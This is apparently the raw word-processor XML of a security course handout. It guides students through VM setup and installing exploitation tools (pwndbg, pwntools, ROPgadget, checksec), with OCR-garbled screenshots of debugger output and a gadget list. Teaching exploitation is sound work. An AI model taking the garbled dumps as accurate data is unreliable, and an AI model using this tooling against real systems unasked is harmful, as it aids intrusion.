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h23kr5mvn6" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notice 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j8nb9y7j3j5y" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Link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Google drive Link : https://shorturl.at/bcBX8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This note : https://shorturl.at/imnqF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Instructor PC : http://10.10.23.31:8080/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— </w:t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g3mf91mk9ccz" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.09.08 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qb54s3zhs2gr" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VMWare </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nfdn7qn3gi7m" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Installation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VMWare Workstation Player : https://www.vmware.com/go/getplayer-win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VMWare Fusion Player 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https://www.vmware.com/go/getfusionplayer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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https://customerconnect.vmware.com/en/evalcenter?p=fusion-player-personal-13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(For M1 user, you have to install UTM </w:t>
      </w:r>
      <w:hyperlink w:anchor="_aff633c3asjb">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">&lt;Link&gt;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ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-installed Ubuntu image path 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12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a5nm2ifsmx18" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared folder path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$ ls /mnt/hgfs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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_brdkr6noc4t0" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">when shared folder is not shown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vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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aff633c3asjb" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UTM installation Guide (For M1 Macbook users)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Because VMWare Fusion Player on M1 Macbook *only* support `amd64` Ubuntu not `x64_86`. So you have to install UTM instead of VMWare Fusion Player.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Download Link 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https://mac.getutm.app/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Download pre-installed Ubuntu image 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Load Ubuntu image </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="43053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37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$ sudo dhclient </w:t>
            </w:r>
          </w:p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$ ifconfig </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gv99c6s391r3" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program installation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sudo apt install terminator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Sudo apt install vim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sudo apt install socat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3"/>
        <w:tblW w:w="6540.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblBorders>
          <w:top w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:left w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:bottom w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:right w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:insideH w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:insideV w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6540"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="6540"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="915" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
              <w:left w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
              <w:bottom w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
              <w:right w:color="a3a3a3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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">git clone</w:t>
            </w:r>
            <w:hyperlink r:id="rId14">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
            </w:hyperlink>
            <w:hyperlink r:id="rId15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https://github.com/pwndbg/pwndbg</w:t>
                <w:br w:type="textWrapping"/>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> cd pwndbg</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve"> ./setup.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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descr="00:0000 rbp rsp &#10;7 f f f f f f fe370 &#10;x &#10;s hs:— ssh &#10;*RAX &#10;RBX &#10;*RCX &#10;4— &#10;*RDX &#10;*RDI &#10;*RSI &#10;*RIO &#10;*Ril &#10;*R13 &#10;*R14 &#10;*R15 &#10;*RBP &#10;*RSP &#10;*RIP &#10;ă— &#10;(mai n) &#10;a— endbr64 &#10;0x7fffffffe498 0x7fffffffe70b &#10;' SHELL=/bin/bash ' &#10;0x555555555149 &#10;0x0 &#10;0x555555557dcO &#10;0x1 &#10;O x ff ff &#10;0x7ffff7fa5f10 &#10;0x7ffff7fc9040 &#10;0x7ffff7fde680 &#10;0x7fffffffe488 &#10;0x555555555149 &#10;0x555555557dcO &#10;f ff f ff f e370 &#10;0x7fffffffe370 0x1 &#10;0x555555555151 &#10;0x555555555100 ( _ &#10;0x555555555100 ( _ &#10;_do_global_dtors_aux) &#10;endbr64 &#10;0x7fffffffe6fb a— '/home/yhs/a . out &#10;(initia1+16) 0x4 &#10;(_dl_fini) &#10;ă— endbr64 &#10;Oxd00120000000e &#10;(_dl_audi t_preinit) &#10;ă— endbr64 &#10;0x7fffffffe6fb a— / home/yhs/a . out &#10;(mai n) &#10;a— endbr64 &#10;(_rtld_global) &#10;0x7ffff7ffe2e0 &#10;4— 0x1 &#10;(main+8) &#10;a— sub rsp, 0x10 &#10;ă— endbr64 &#10;-s 0x555555554000 0x10102464c457f &#10;—C DISASM / x 86-64 set e mulate on &#10;0x555555555151 &#10;0x555555555155 &#10;0x555555555158 &#10;0x55555555515c &#10;0x555555555163 &#10;0x555555555166 &#10;0x55555555516b &#10;0x555555555170 &#10;0x555555555171 &#10;0x555555555172 &#10;0x555555555174 &#10;emain+12&gt; &#10;&lt;tnai n+19&gt; &#10;emain+26&gt; &#10;&lt;mai n+29&gt; &#10;emain+34&gt; &#10;n+39&gt; &#10;&lt;tna i n +40&gt; &#10;sub &#10;mov &#10;lea &#10;cal I &#10;mov &#10;I eave &#10;ret &#10;add &#10;endbr64 &#10;rsp, 0x10 &#10;dword ptr Crbp - 4], edi &#10;qword ptr Crbp - 0x10], rsi &#10;rax, Crip + Oxeal) &#10;rdi, rax &#10;puts@plt &#10;eax, 0 &#10;byte ptr Crax], al &#10;STACK 1 &#10;01 : 0008 &#10;02 :ooło &#10;03 :0018 &#10;04:0020 &#10;05 :0028 &#10;06:0030 &#10;07 : 0038 &#10;1 &#10;2 &#10;3 &#10;0x7fffffffe378 &#10;0x7fffffffe390 • &#10;7 f ff f ff e 398 &#10;0x7fffffffe3a8 &#10;a- 0X1 &#10;ox7ffff7db4d90 &#10;0x0 &#10;0x555555555149 &#10;- 0x100000000 &#10;7 ff f fe488 &#10;0x0 &#10;l_mai n+128) &#10;mov edi , &#10;eax &#10;(mai n) &#10;a— endbr64 &#10;-s Ox7fffffffe6fb &#10;' /home/yhs/a. out ' &#10;Oxd451fb456009b5e3 &#10;BACKTRACE I &#10;0x555555555151 main+8 &#10;0x7ffff7db4d90 &#10;O x 7 ff f &#10;0x555555555085 &#10;l_main+128 &#10;_libc-start—main+128 &#10;_start+37 &#10;pwndbg&gt; q " id="17" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="00:0000 rbp rsp &#10;7 f f f f f f fe370 &#10;x &#10;s hs:— ssh &#10;*RAX &#10;RBX &#10;*RCX &#10;4— &#10;*RDX &#10;*RDI &#10;*RSI &#10;*RIO &#10;*Ril &#10;*R13 &#10;*R14 &#10;*R15 &#10;*RBP &#10;*RSP &#10;*RIP &#10;ă— &#10;(mai n) &#10;a— endbr64 &#10;0x7fffffffe498 0x7fffffffe70b &#10;' SHELL=/bin/bash ' &#10;0x555555555149 &#10;0x0 &#10;0x555555557dcO &#10;0x1 &#10;O x ff ff &#10;0x7ffff7fa5f10 &#10;0x7ffff7fc9040 &#10;0x7ffff7fde680 &#10;0x7fffffffe488 &#10;0x555555555149 &#10;0x555555557dcO &#10;f ff f ff f e370 &#10;0x7fffffffe370 0x1 &#10;0x555555555151 &#10;0x555555555100 ( _ &#10;0x555555555100 ( _ &#10;_do_global_dtors_aux) &#10;endbr64 &#10;0x7fffffffe6fb a— '/home/yhs/a . out &#10;(initia1+16) 0x4 &#10;(_dl_fini) &#10;ă— endbr64 &#10;Oxd00120000000e &#10;(_dl_audi t_preinit) &#10;ă— endbr64 &#10;0x7fffffffe6fb a— / home/yhs/a . out &#10;(mai n) &#10;a— endbr64 &#10;(_rtld_global) &#10;0x7ffff7ffe2e0 &#10;4— 0x1 &#10;(main+8) &#10;a— sub rsp, 0x10 &#10;ă— endbr64 &#10;-s 0x555555554000 0x10102464c457f &#10;—C DISASM / x 86-64 set e mulate on &#10;0x555555555151 &#10;0x555555555155 &#10;0x555555555158 &#10;0x55555555515c &#10;0x555555555163 &#10;0x555555555166 &#10;0x55555555516b &#10;0x555555555170 &#10;0x555555555171 &#10;0x555555555172 &#10;0x555555555174 &#10;emain+12&gt; &#10;&lt;tnai n+19&gt; &#10;emain+26&gt; &#10;&lt;mai n+29&gt; &#10;emain+34&gt; &#10;n+39&gt; &#10;&lt;tna i n +40&gt; &#10;sub &#10;mov &#10;lea &#10;cal I &#10;mov &#10;I eave &#10;ret &#10;add &#10;endbr64 &#10;rsp, 0x10 &#10;dword ptr Crbp - 4], edi &#10;qword ptr Crbp - 0x10], rsi &#10;rax, Crip + Oxeal) &#10;rdi, rax &#10;puts@plt &#10;eax, 0 &#10;byte ptr Crax], al &#10;STACK 1 &#10;01 : 0008 &#10;02 :ooło &#10;03 :0018 &#10;04:0020 &#10;05 :0028 &#10;06:0030 &#10;07 : 0038 &#10;1 &#10;2 &#10;3 &#10;0x7fffffffe378 &#10;0x7fffffffe390 • &#10;7 f ff f ff e 398 &#10;0x7fffffffe3a8 &#10;a- 0X1 &#10;ox7ffff7db4d90 &#10;0x0 &#10;0x555555555149 &#10;- 0x100000000 &#10;7 ff f fe488 &#10;0x0 &#10;l_mai n+128) &#10;mov edi , &#10;eax &#10;(mai n) &#10;a— endbr64 &#10;-s Ox7fffffffe6fb &#10;' /home/yhs/a. out ' &#10;Oxd451fb456009b5e3 &#10;BACKTRACE I &#10;0x555555555151 main+8 &#10;0x7ffff7db4d90 &#10;O x 7 ff f &#10;0x555555555085 &#10;l_main+128 &#10;_libc-start—main+128 &#10;_start+37 &#10;pwndbg&gt; q "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120.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblBorders>
          <w:top w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:left w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:bottom w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:right w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:insideH w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:insideV w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9120"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9120"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1110" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
              <w:left w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
              <w:bottom w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
              <w:right w:color="a3a3a3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color w:val="63686c"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="63686c"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get update</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve"> apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve"> python3 -m pip install --upgrade pip</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve"> python3 -m pip install --upgrade pwntools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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5"/>
        <w:tblW w:w="6330.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblBorders>
          <w:top w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:left w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:bottom w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:right w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:insideH w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
          <w:insideV w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6330"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="6330"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="645" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
              <w:left w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
              <w:bottom w:color="a3a3a3" w:space="0" w:sz="6" w:val="single"/>
              <w:right w:color="a3a3a3" w:space="0" w:sz="6" w:val="single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>
                <w:color w:val="63686c"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="63686c"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/sudo apt install python3-pip</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve"> sudo -H python3 -m pip install ROPgadget</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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46800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="ROPgadget - -binary &#10;. (a. out &#10;Gadgets information &#10;. add &#10;øxøøoøøoøøoøøøløtß &#10;. add &#10;ØxØØOØØOØØOØØ0113c &#10;. add &#10;. add &#10;øxØØOØØOØØOØØ01Øb4 &#10;. add &#10;ØxØØØØØØØØØØØØ116d &#10;. add &#10;. add &#10;. add &#10;ØxØØØØØØØØØØØØ113e &#10;add &#10;. add &#10;ØxØØOØØOØØOØØ01Øb6 &#10;. add &#10;ØxØØØØØØØØØØØØIØØd &#10;. add &#10;øxøøøøøøøøøøømøa8 &#10;. add &#10;øxøøoøøoøøoøøøløeg &#10;. add &#10;ØxØØØØØØØØØØØØIØf5 &#10;. add &#10;. add &#10;ØxØØOØØOØØOØØØ112f &#10;. add &#10;ØxØØØØØØØØØØØØ116f &#10;. add &#10;øxøøøøøøøøøøøm€38 &#10;. add &#10;øxØØOØØOØØOØØ01132 &#10;. add &#10;ØxØØØØØØØØØØØØIØe7 &#10;. add &#10;øxøøoøøoøøoøøol€17 &#10;. add &#10;øxøøoøøøøøøø001016 &#10;. add &#10;ØxØØØØØØØØØØØØIØ3e &#10;øxøøoøøøøøoøøm€14 &#10;øxØØOØØOØØOØØ01143 &#10;øxøøoøøoøøoø€0114ø &#10;ØxØØØØØØØØØØØØIØØb &#10;øxøøøøøøøøøøømmz &#10;øxøøøøøøøøøøømøad &#10;ØxØØOØØOØØOØØ01Øee &#10;ØxØØOØØOØØOØØ01Ø3a &#10;øxØØOØØOØØOØØ01144 &#10;ØxØØOØØOØØOØØØIØaf &#10;øxøøøøøøøøøøøølln &#10;øxøøoøøøøøoøøm€fl &#10;øxØØØØØØØØØØØ0112c &#10;ØxØØOØØOØØOØØØ116b • &#10;øxØØOØØOØØOØØ01Øf3 &#10;ØxØØOØØOØØOØØ01Øb1 &#10;ØxØØOØØOØØOØØØIØf2 &#10;øxøøoøøøøøoøømøef &#10;øxØØOØØOØØOØØØ1133 &#10;øxøøøøøøøøøøømma . &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;Crax] , &#10;Crax] , &#10;Crax] , &#10;Crax] , &#10;Crax] , &#10;Crax] , &#10;Crax] , &#10;Crax] &#10;Crax] , &#10;Crax] , &#10;Crax] &#10;Crax] , &#10;Crax] , &#10;Crax] &#10;Crax] , &#10;Cru] , &#10;al &#10;al &#10;al &#10;al &#10;al &#10;al &#10;al , &#10;al , &#10;al , &#10;, al &#10;r8b &#10;; add byte ptr Crax] , &#10;add byte ptr Crax], al &#10;, add byte ptr [rax] , &#10;; add byte ptr Crax] , &#10;; add byte ptr , &#10;add cl, cl &#10;ret &#10;al ; endbr64 ; jmp Øx1Øcø &#10;, ret &#10;, endbr64 ; jmp OxlOcØ &#10;al &#10;al &#10;leave , ret &#10;ret &#10;; add dl, dh ; jmp Øx1Ø2Ø &#10;; add dword ptr &#10;; endbr64 ; jmp &#10;leave ; ret &#10;ebx &#10;nop dword ptr Crax] &#10;ret &#10;, ret &#10;test rax, &#10;test rax, &#10;, test rax, &#10;ret &#10;al ; pop rbp &#10;rax &#10;rax &#10;rax &#10;ret &#10;Crbp - Ox3d] , &#10;øx1Øcø &#10;; je øx1Ø16 • &#10;je Øx1Øb8 &#10;je Øx1Øf8 &#10;call rax &#10;jmp rax &#10;Jmp rax &#10;cs: Crax], al &#10;ret &#10;; jmp øx1Ø20 &#10;; add dword ptr Crbp - &#10;ebx ; nop dword ptr &#10;eax, eax ; je Øx1Øf8 &#10;Ox3d], ebx , &#10;Crax] &#10;, ret &#10;jmp rax &#10;nop dword ptr Crax] &#10;ret &#10;cl, cl , &#10;dl, dh &#10;dword ptr Crbp - Øx3d] , &#10;eax, Øx48ØØØØ2f , &#10;test &#10;esp, 8 ; ret &#10;rsp, 8 &#10;ret &#10;. call qword ptr [rax - Ox5e1fØØd] &#10;call rax &#10;. cli ; jmp OxlOcØ &#10;cli &#10;sub rsp, 8 ; add rsp, 8 &#10;ret &#10;. endbr64 ; jmp øx1ØcO &#10;fldcw word ptr [rdi] ; add byte ptr Crax] , &#10;je Øx1Ø16 ; call rax &#10;. je Øx1Øb8 ; jmp rax &#10;. je Øx1Øf8 ; jmp rax &#10;. jmp OxlØ2Ø &#10;. jmp OxlOcØ &#10;. jrnp rax &#10;leave &#10;ret &#10;. loopne Ox1159 ; nop dword ptr Crax + rax] &#10;mov byte ptr Crip + Øx2edd], 1 ; pop rbp ; ret &#10;ret &#10;rax ; je ox1016 &#10;test rax, &#10;ret &#10;call rax &#10;mov eax, ; leave ; ret &#10;nop dword ptr Crax + rax] &#10;nop dword ptr Crax] &#10;ret &#10;nop word ptr Crax + rax] &#10;. or bh, bh &#10;loopne Ox1159 &#10;pop rbp ; ret &#10;ret &#10;, ret &#10;ret &#10;; nop dword ptr frax + rax] " id="11" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="ROPgadget - -binary &#10;. (a. out &#10;Gadgets information &#10;. add &#10;øxøøoøøoøøoøøøløtß &#10;. add &#10;ØxØØOØØOØØOØØ0113c &#10;. add &#10;. add &#10;øxØØOØØOØØOØØ01Øb4 &#10;. add &#10;ØxØØØØØØØØØØØØ116d &#10;. add &#10;. add &#10;. add &#10;ØxØØØØØØØØØØØØ113e &#10;add &#10;. add &#10;ØxØØOØØOØØOØØ01Øb6 &#10;. add &#10;ØxØØØØØØØØØØØØIØØd &#10;. add &#10;øxøøøøøøøøøøømøa8 &#10;. add &#10;øxøøoøøoøøoøøøløeg &#10;. add &#10;ØxØØØØØØØØØØØØIØf5 &#10;. add &#10;. add &#10;ØxØØOØØOØØOØØØ112f &#10;. add &#10;ØxØØØØØØØØØØØØ116f &#10;. add &#10;øxøøøøøøøøøøøm€38 &#10;. add &#10;øxØØOØØOØØOØØ01132 &#10;. add &#10;ØxØØØØØØØØØØØØIØe7 &#10;. add &#10;øxøøoøøoøøoøøol€17 &#10;. add &#10;øxøøoøøøøøøø001016 &#10;. add &#10;ØxØØØØØØØØØØØØIØ3e &#10;øxøøoøøøøøoøøm€14 &#10;øxØØOØØOØØOØØ01143 &#10;øxøøoøøoøøoø€0114ø &#10;ØxØØØØØØØØØØØØIØØb &#10;øxøøøøøøøøøøømmz &#10;øxøøøøøøøøøøømøad &#10;ØxØØOØØOØØOØØ01Øee &#10;ØxØØOØØOØØOØØ01Ø3a &#10;øxØØOØØOØØOØØ01144 &#10;ØxØØOØØOØØOØØØIØaf &#10;øxøøøøøøøøøøøølln &#10;øxøøoøøøøøoøøm€fl &#10;øxØØØØØØØØØØØ0112c &#10;ØxØØOØØOØØOØØØ116b • &#10;øxØØOØØOØØOØØ01Øf3 &#10;ØxØØOØØOØØOØØ01Øb1 &#10;ØxØØOØØOØØOØØØIØf2 &#10;øxøøoøøøøøoøømøef &#10;øxØØOØØOØØOØØØ1133 &#10;øxøøøøøøøøøøømma . &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;byte &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;ptr &#10;Crax] , &#10;Crax] , &#10;Crax] , &#10;Crax] , &#10;Crax] , &#10;Crax] , &#10;Crax] , &#10;Crax] &#10;Crax] , &#10;Crax] , &#10;Crax] &#10;Crax] , &#10;Crax] , &#10;Crax] &#10;Crax] , &#10;Cru] , &#10;al &#10;al &#10;al &#10;al &#10;al &#10;al &#10;al , &#10;al , &#10;al , &#10;, al &#10;r8b &#10;; add byte ptr Crax] , &#10;add byte ptr Crax], al &#10;, add byte ptr [rax] , &#10;; add byte ptr Crax] , &#10;; add byte ptr , &#10;add cl, cl &#10;ret &#10;al ; endbr64 ; jmp Øx1Øcø &#10;, ret &#10;, endbr64 ; jmp OxlOcØ &#10;al &#10;al &#10;leave , ret &#10;ret &#10;; add dl, dh ; jmp Øx1Ø2Ø &#10;; add dword ptr &#10;; endbr64 ; jmp &#10;leave ; ret &#10;ebx &#10;nop dword ptr Crax] &#10;ret &#10;, ret &#10;test rax, &#10;test rax, &#10;, test rax, &#10;ret &#10;al ; pop rbp &#10;rax &#10;rax &#10;rax &#10;ret &#10;Crbp - Ox3d] , &#10;øx1Øcø &#10;; je øx1Ø16 • &#10;je Øx1Øb8 &#10;je Øx1Øf8 &#10;call rax &#10;jmp rax &#10;Jmp rax &#10;cs: Crax], al &#10;ret &#10;; jmp øx1Ø20 &#10;; add dword ptr Crbp - &#10;ebx ; nop dword ptr &#10;eax, eax ; je Øx1Øf8 &#10;Ox3d], ebx , &#10;Crax] &#10;, ret &#10;jmp rax &#10;nop dword ptr Crax] &#10;ret &#10;cl, cl , &#10;dl, dh &#10;dword ptr Crbp - Øx3d] , &#10;eax, Øx48ØØØØ2f , &#10;test &#10;esp, 8 ; ret &#10;rsp, 8 &#10;ret &#10;. call qword ptr [rax - Ox5e1fØØd] &#10;call rax &#10;. cli ; jmp OxlOcØ &#10;cli &#10;sub rsp, 8 ; add rsp, 8 &#10;ret &#10;. endbr64 ; jmp øx1ØcO &#10;fldcw word ptr [rdi] ; add byte ptr Crax] , &#10;je Øx1Ø16 ; call rax &#10;. je Øx1Øb8 ; jmp rax &#10;. je Øx1Øf8 ; jmp rax &#10;. jmp OxlØ2Ø &#10;. jmp OxlOcØ &#10;. jrnp rax &#10;leave &#10;ret &#10;. loopne Ox1159 ; nop dword ptr Crax + rax] &#10;mov byte ptr Crip + Øx2edd], 1 ; pop rbp ; ret &#10;ret &#10;rax ; je ox1016 &#10;test rax, &#10;ret &#10;call rax &#10;mov eax, ; leave ; ret &#10;nop dword ptr Crax + rax] &#10;nop dword ptr Crax] &#10;ret &#10;nop word ptr Crax + rax] &#10;. or bh, bh &#10;loopne Ox1159 &#10;pop rbp ; ret &#10;ret &#10;, ret &#10;ret &#10;; nop dword ptr frax + rax] "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sudo apt install checksec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descr="yhseyhs : —$ &#10;RELRO &#10;Full RELRO &#10;checksec --file= ./hello &#10;STACK CANARY &#10;No canarv found &#10;enabled &#10;PIE &#10;PIE &#10;enabled &#10;R PATH &#10;No RPATH &#10;RUNPATH &#10;No RUNPATH &#10;Symbol s &#10;36) Svmbols &#10;FORTIFY &#10;No &#10;Forti fied &#10;Fortifiable &#10;FILE &#10;. /hello " id="12" name="image5.png"/>
